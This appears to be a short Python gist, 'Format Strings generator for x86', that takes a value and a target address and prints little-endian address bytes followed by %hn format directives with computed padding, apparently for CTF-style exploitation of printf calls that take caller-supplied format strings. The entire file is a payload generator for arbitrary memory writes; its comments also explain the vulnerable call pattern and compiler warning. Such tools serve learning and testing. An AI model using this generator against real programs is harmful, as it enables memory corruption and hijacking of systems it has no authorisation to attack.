Created
June 23, 2018 10:29
Format Strings generator for x86
def little_endian(hex_str):
    """Return the bytes of *hex_str* with the byte order reversed.

    The string is first passed through ``fix_hex``, then cut into
    two-character groups starting from the left; the groups are emitted
    in reverse order and decoded with ``bytes.fromhex``.

    Raises:
        ValueError: if the regrouped string is not valid hex for
            ``bytes.fromhex`` (for example an odd number of digits).
    """
    padded = fix_hex(hex_str)
    pairs = []
    for start in range(0, len(padded), 2):
        # Prepending each pair reverses the byte order as we go.
        pairs.insert(0, padded[start:start + 2])
    return bytes.fromhex("".join(pairs))
def remove0x(hex_str):
    """Drop the first two characters of *hex_str*.

    Callers in this file pass the output of ``hex()``, so the two
    characters are the ``0x`` prefix. The prefix is not checked: any
    two leading characters are removed.
    """
    prefix_len = len("0x")
    return hex_str[prefix_len:]
def half(hex_str):
    """Split *hex_str* into two integers: first four digits, then the rest.

    The string is normalised with ``fix_hex`` before slicing. Both
    slices are parsed as base-16, so a string of four digits or fewer
    leaves the second slice empty and ``int`` raises ``ValueError``.

    Returns:
        A ``(leading, trailing)`` tuple of ints.
    """
    padded = fix_hex(hex_str)
    leading, trailing = padded[:4], padded[4:]
    return int(leading, 16), int(trailing, 16)
def fix_hex(hex_str):
    """Left-pad a seven-digit hex string with one ``'0'``.

    Only the exact length 7 is handled; every other length, including
    strings shorter than seven digits, is returned unchanged.
    """
    return '0' + hex_str if len(hex_str) == 7 else hex_str
# Interactive driver. Reads two hexadecimal values from stdin, splits the
# first into two 16-bit halves, and prints two byte strings followed by two
# format-directive templates built from those halves.
#
# The printed directives use %hn, which only has an effect when a program
# passes caller-supplied text as the format argument of a printf-family
# call. Code that keeps the format string constant (printf("%s", buf))
# never interprets them; -Wformat-security flags the unsafe call pattern at
# compile time.
try:
    target = int(input("Insert target address\n"), 16)
    write_addr = int(input("Insert the address where you want to write\n"), 16)
    # Second destination sits two bytes above the first.
    upper_addr = write_addr + 2

    halves = half(remove0x(hex(target)))
    # The smaller half is always emitted first, so the second padding is
    # never negative.
    smaller, larger = min(halves), max(halves)

    print("Here's your format string")
    # print() on a bytes object shows its b'...' repr, not the raw bytes.
    for addr in (write_addr, upper_addr):
        print(little_endian(remove0x(hex(addr))))
    # The literal text "pos" / "pos+1" is a placeholder left in the output;
    # it is not interpolated here.
    # The 8 presumably accounts for the two 4-byte values printed above
    # (TODO confirm).
    print(f"%{smaller - 8}c%pos$hn")
    print(f"%{larger - smaller}c%pos+1$hn")
except Exception:
    # Any failure (bad hex input, short values rejected by half(), ...) is
    # reported with the same generic message; the cause is not shown.
    print("error")